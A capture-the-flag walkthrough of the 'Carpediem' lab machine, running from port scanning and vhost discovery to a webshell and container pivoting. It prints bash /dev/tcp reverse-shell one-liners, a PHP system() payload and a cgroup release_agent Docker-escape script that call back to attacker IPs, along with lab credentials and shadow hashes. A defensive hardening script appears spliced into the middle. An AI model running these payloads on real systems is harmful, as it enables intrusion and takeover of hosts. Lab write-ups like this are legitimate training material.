Basic information

Port scan

22 and 80:

$ nmap -sC -sV -Pn 10.10.11.167
Starting Nmap 7.93 ( https://nmap.org ) at 2022-09-27 13:12 CST
Nmap scan report for 10.10.11.167
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 962176f72dc5f04ee0a8dfb4d95e4526 (RSA)
| 256 b16de3fada10b97b9e57535c5bb76006 (ECDSA)
|_ 256 6a1696d80529d590bf6b2a0932dc364f (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Comming Soon
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.62 seconds

80

A "Coming Soon" page; add the domain obtained from it to hosts:

10.10.11.167 carpediem.htb

Subdomain scan

A regular wordlist scan of subdomains finds portal:

gobuster vhost -u http://carpediem.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt

Found: portal.carpediem.htb (Status: 200) [Size: 31090]

Add to hosts:

10.10.11.167 carpediem.htb portal.carpediem.htb

portal.carpediem.htb

An online motorcycle shop:

Directory scan

A directory scan finds admin under portal:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://portal.carpediem.htb

/admin (Status: 301) [Size: 328] [--> http://portal.carpediem.htb/admin/]
/assets (Status: 301) [Size: 329] [--> http://portal.carpediem.htb/assets/]
/build (Status: 301) [Size: 328] [--> http://portal.carpediem.htb/build/]
/classes (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/classes/]
/dist (Status: 301) [Size: 327] [--> http://portal.carpediem.htb/dist/]
/inc (Status: 301) [Size: 326] [--> http://portal.carpediem.htb/inc/]
/index.php (Status: 200) [Size: 31090]
/libs (Status: 301) [Size: 327] [--> http://portal.carpediem.htb/libs/]
/plugins (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/plugins/]
/uploads (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/uploads/]

portal.carpediem.htb

Register an arbitrary account and log in; the profile-update request contains a login_type parameter:

Changing it to 1 makes us an administrator, and the admin interface becomes accessible:

webshell

In the quarterly-report upload, the page says the upload feature is still under development, but the upload endpoint can be obtained and called directly, which allows uploading a webshell:

reverse shell

www-data inside a container:

bash -c 'exec bash -i &>/dev/tcp/10.10.14.19/4444 <&1'

Docker subnet scan

The network was quite poor for this part, so I followed a writeup instead of doing it hands-on.

Probing the Docker subnet reveals other containers:

Nmap scan report for 172.17.0.1
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap scan report for 172.17.0.2
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
443/tcp open https

Nmap scan report for 172.17.0.3
PORT STATE SERVICE
27017/tcp open unknown

Nmap scan report for 172.17.0.4
PORT STATE SERVICE
3306/tcp open mysql
33060/tcp open unknown

Nmap scan report for 172.17.0.5
PORT STATE SERVICE
8118/tcp open unknown

mongosh

Forward 27017 and 8118 to local for access:

# local
chisel server --reverse --port 8000

# target
www-data@3c371615b7aa:/dev/shm$ ./chisel client 10.10.14.19:8000 R:8118:172.17.0.5:8118 R:27017:172.17.0.3:27017 &

Visiting local port 8000 shows Trudesk. The account credentials are in Mongo but cannot be cracked; the passwords are bcrypt, so generate one and modify the database directly:

❯ python3 password.py
$2b$10$zX4LTPwe7bEjhvQ.lbNgNuttsUcvcstL6SHHhZhIXouFObHXxYqey

mongosh mongodb://127.0.0.1:27017
test> use trudesk
trudesk> db.accounts.update( {"_id": ObjectId("623c8b20855cc5001a8ba13c")}, {$set: {"password": "$2b$10$zX4LTPwe7bEjhvQ.lbNgNuttsUcvcstL6SHHhZhIXouFObHXxYqey"}});

Then log in to Trudesk with the modified password; one of the tickets contains Zoiper-related information.

zoiper

We know the domain is carpediem.htb, and it tells us that 9560 is the user.

The password hint tells us that it is now 2022 and that by dialing *62 we can listen to the credentials.

We start from the data we obtained; when we dial, we listen to the credentials.

The credentials obtained are hflaccus : AuRj4pxq9qPk, and we can connect via ssh.

bcrypt.py

import bcrypt

# Plaintext to set for the Trudesk account; the bcrypt cost (rounds=10) matches
# the $2b$10$ prefix of the existing hashes in the accounts collection.
password = "password"
salt = bcrypt.gensalt(rounds=10)
encoded = bcrypt.hashpw(password.encode(), salt)

print(encoded.decode())

user flag

Connect via ssh with the hflaccus account obtained above and get the user flag:

backdrop

Continuing from the writeup: as hflaccus, tcpdump captures some HTTPS traffic; decrypting it with the corresponding private key yields jpardella's credentials:

tcpdump -i any port 443 -w captura

file /etc/ssl/certs/backdrop.carpediem.htb.key
/etc/ssl/certs/backdrop.carpediem.htb.key: PEM RSA private key

jpardella
tGPN6AmJDZwYWdhY

8002 Backdrop

These credentials log in to Backdrop on port 8002:

sshpass -p AuRj4pxq9qPk ssh hflaccus@10.10.11.167 -L 8002:127.0.0.1:8002

Exploiting the corresponding vulnerability, import a malicious module and browse to it to execute it, getting a shell in the Backdrop container.

Information

Looking for interesting files, we find a script in /opt:

www-data@90c7f522b842:/opt$ cat heartbeat.sh
#!/bin/bash
#Run a site availability check every 10 seconds via cron
checksum=($(/usr/bin/md5sum /var/www/html/backdrop/core/scripts/backdrop.sh))
if [[ $checksum != "70a121c0202a33567101e2330c069b34" ]]; then
exit
fi
status=$(php /var/www/html/backdrop/core/scripts/backdrop.sh --root /var/www/html/backdrop https://localhost)
grep "Welcome to backdrop.carpediem.htb!" "$status"
if [[ "$?" != 0 ]]; then
#something went wrong. restoring from backup.
cp /root/index.php /var/www/html/backdrop/index.php
fi
www-data@90c7f522b842:/opt$

Every so often it changes the index.php file and calls it, or something along those lines.

So we modify the corresponding PHP file directly and wait for it to be triggered, getting root in the container:
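As an added, defensive counterpart (not the box's heartbeat.sh and not the author's code), the script below closes the two gaps visible in the original: it verifies a manifest of every file under the web root before root runs PHP over it, rather than hashing backdrop.sh alone, and it greps the page body on stdin instead of passing it as a file name. The paths and the manifest location are assumptions.

```shell
#!/bin/bash
# Added example: a hardened re-implementation of the heartbeat.sh logic shown above.
# Not the box's script. Paths are assumptions; the manifest must be an absolute path
# stored outside the web root (e.g. under /root), so www-data cannot update it
# alongside the files it covers.

# Record an md5 for every file under the web root from a known-good tree (deploy time).
build_manifest() {
    local docroot="$1" manifest="$2"
    ( cd "$docroot" && find . -type f -print0 | sort -z | xargs -0 md5sum ) > "$manifest"
}

# Return 0 only if every recorded file is unchanged. The original hashed only
# backdrop.sh, so a www-data-writable index.php was still loaded by PHP running as root.
verify_docroot() {
    local docroot="$1" manifest="$2"
    ( cd "$docroot" && md5sum --check --quiet "$manifest" ) >/dev/null 2>&1
}

# Return 0 if the fetched page body carries the expected banner. The original ran
# grep "..." "$status", which treats the page body as a file name; feed it on stdin.
page_healthy() {
    printf '%s' "$1" | grep -q 'Welcome to backdrop.carpediem.htb!'
}

# Cron entry point: refuse to run PHP over a tampered tree and alert, instead of
# silently copying index.php back while any other modified file stays in place.
heartbeat() {
    local docroot="$1" manifest="$2" status
    if ! verify_docroot "$docroot" "$manifest"; then
        echo "heartbeat: web root does not match manifest, not running PHP" >&2
        return 2
    fi
    status=$(php "$docroot/core/scripts/backdrop.sh" --root "$docroot" https://localhost)
    page_healthy "$status"
}
```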

❯ cat index.php
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.10/443 0>&1'");?>

www-data@90c7f522b842:~/html/backdrop$ rm -f index.php
www-data@90c7f522b842:~/html/backdrop$ wget http://10.10.14.10/index.php

Docker escape & root flag

Then comes the escape, which gives root on the host outside the container:

❯ cat script.sh
mkdir /dev/shm/privesc
mount -t cgroup -o rdma cgroup /dev/shm/privesc
mkdir /dev/shm/privesc/x
echo 1 > /dev/shm/privesc/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /dev/shm/privesc/release_agent
echo '#!/bin/bash' > /cmd
echo "bash -c 'bash -i >& /dev/tcp/10.10.14.10/443 0>&1'" >> /cmd
chmod a+x /cmd
bash -c "echo \$\$ > /dev/shm/privesc/x/cgroup.procs"

root@90c7f522b842:~# unshare -UrmC bash
root@90c7f522b842:~# wget http://10.10.14.10/script.sh &>/dev/null
root@90c7f522b842:~# chmod +x script.sh
root@90c7f522b842:~# ./script.sh
root@90c7f522b842:~#

root_id_rsa


shadow

root:$6$y5QrvfE3csMMok1t$DvYGED3VsftC3ylIHA8yGVg2j2KiP7uooPn309LahXXPEZulnVWBwwKLorPdiW5snCgWEYN6F24b8LQALG1CD1:19081:0:99999:7:::
hflaccus:$6$Y3pKa50HWcGkr/KE$ZBG57pq5RIwDs9l75xJMz5Cv2SweVTFOcsv3WzRLC9c/QRX7wSgNT/XekUYExD30WTZiCHYhLg25mSTRgoZlT.:19083:0:99999:7:::

References